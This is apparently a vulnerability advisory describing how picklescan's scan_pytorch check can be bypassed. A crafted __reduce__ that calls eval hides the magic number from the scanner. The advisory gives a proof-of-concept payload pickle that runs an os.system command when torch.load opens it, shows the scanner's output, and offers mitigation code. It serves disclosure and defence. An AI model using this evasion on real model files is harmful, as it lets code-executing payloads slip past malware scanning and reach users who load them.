Lack of data validation in picklescan

Description

Picklescan (scan_pytorch) Bypass via dynamic eval MAGIC_NUMBER

Summary

This is a scanning bypass of the scan_pytorch function in picklescan. picklescan's get_magic_number() iterates over pickletools.genops(data) and takes the magic number from an opcode whose name contains INT or LONG, whereas PyTorch simply calls pickle_module.load() to read the magic number. Because of this implementation difference, an attacker can embed the magic number in the PyTorch file through a \_\_reduce\_\_ method that calls eval at load time. pickletools.genops(data) then finds no INT or LONG opcode carrying the magic number, while pickle_module.load() still returns the expected value, leading to a bypass.
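The difference between the two ways of reading the magic number can be reproduced with the standard library alone. The sketch below is illustrative only: scan_magic_number is a hypothetical stand-in written from the description above, not picklescan's actual code, and EvalMagic evaluates a numeric literal rather than the name 'MAGIC_NUMBER' so that the example runs without PyTorch. The integer is the expected magic number reported in the picklescan error message in this advisory.

```python
import io
import pickle
import pickletools

# Expected magic number, as printed in the picklescan error message.
MAGIC_NUMBER = 119547037146038801333356


def scan_magic_number(data):
    """Hypothetical stand-in for the scanner-side check (an assumption,
    based on the advisory text): return the argument of an opcode whose
    name contains INT or LONG, or None if there is no such opcode."""
    for opcode, arg, _pos in pickletools.genops(data):
        if "INT" in opcode.name or "LONG" in opcode.name:
            return int(arg)
    return None


class EvalMagic:
    """Unpickles to the magic number by calling eval at load time."""

    def __reduce__(self):
        # A harmless numeric literal; the PoC passes 'MAGIC_NUMBER' instead.
        return (eval, (str(MAGIC_NUMBER),))


honest = pickle.dumps(MAGIC_NUMBER, protocol=2)    # integer stored directly
evasive = pickle.dumps(EvalMagic(), protocol=2)    # integer computed by eval

print(scan_magic_number(io.BytesIO(honest)))       # opcode walk finds the integer
print(scan_magic_number(io.BytesIO(evasive)))      # opcode walk finds nothing
print(pickle.loads(evasive) == MAGIC_NUMBER)       # the loader still gets the value
```

The opcode walk only sees a global reference, a string, and a REDUCE call in the second pickle, so it reports no magic number, while the loader executes the call and obtains the integer.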

PoC

Attack Step 1

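We can edit the source code of PyTorch's _legacy_save() function as follows:

    # Instead of dumping the MAGIC_NUMBER integer directly, dump an object
    # whose __reduce__ makes the loader compute the value with eval.
    class payload:
        def __reduce__(self):
            return (eval, ('MAGIC_NUMBER',))

    pickle_module.dump(payload(), f, protocol=pickle_protocol)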

Attack Step 2

With the modified version of PyTorch, run the following PoC to generate payload.pt:

    import torch

    class payload:
        def __reduce__(self):
            return (__import__('os').system, ('touch /tmp/hacked',))

    torch.save(payload(), './payload.pt', _use_new_zipfile_serialization=False)

Picklescan result

    ERROR: Invalid magic number for file /home/pzhou/bug-bunty/pytorch/PoC/payload.pt: None != 119547037146038801333356
    ----------- SCAN SUMMARY -----------
    Scanned files: 0
    Infected files: 0
    Dangerous globals: 0

Victim Step

    import torch
    torch.load('./payload.pt', weights_only=False)

After the load, the file /tmp/hacked exists on the local system, which shows that the embedded command was executed.

Impact

An attacker can craft malicious PyTorch payloads that bypass picklescan and then achieve arbitrary or remote code execution (ACE/RCE) when the file is loaded.

Mitigation
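One possible hardening, offered only as a sketch and not as picklescan's actual fix, is to accept the magic-number pickle only when it is a bare integer literal, and to treat anything containing imports or calls as suspicious instead of skipping the file. The helper name first_pickle_is_plain_int and the allow-list of opcodes are assumptions made for this illustration.

```python
import pickle
import pickletools

# Opcodes that can appear when a single integer is pickled on its own.
# This allow-list is an assumption for illustration, not picklescan's logic.
ALLOWED_OPCODES = {
    "PROTO", "FRAME", "STOP",
    "INT", "BININT", "BININT1", "BININT2",
    "LONG", "LONG1", "LONG4",
}


def first_pickle_is_plain_int(data: bytes) -> bool:
    """Return True only if every opcode in the pickle belongs to the
    integer-literal allow-list, i.e. no GLOBAL, REDUCE, or string opcodes."""
    return all(
        opcode.name in ALLOWED_OPCODES
        for opcode, _arg, _pos in pickletools.genops(data)
    )


class EvalMagic:
    """Same trick as in the PoC, with a harmless numeric literal."""

    def __reduce__(self):
        return (eval, ("119547037146038801333356",))


plain = pickle.dumps(119547037146038801333356, protocol=2)
crafted = pickle.dumps(EvalMagic(), protocol=2)

print(first_pickle_is_plain_int(plain))    # integer literal only
print(first_pickle_is_plain_int(crafted))  # contains an import and a call
```

With a check of this kind, a file whose magic number is produced by a call would be reported rather than silently counted as not scanned.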

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.
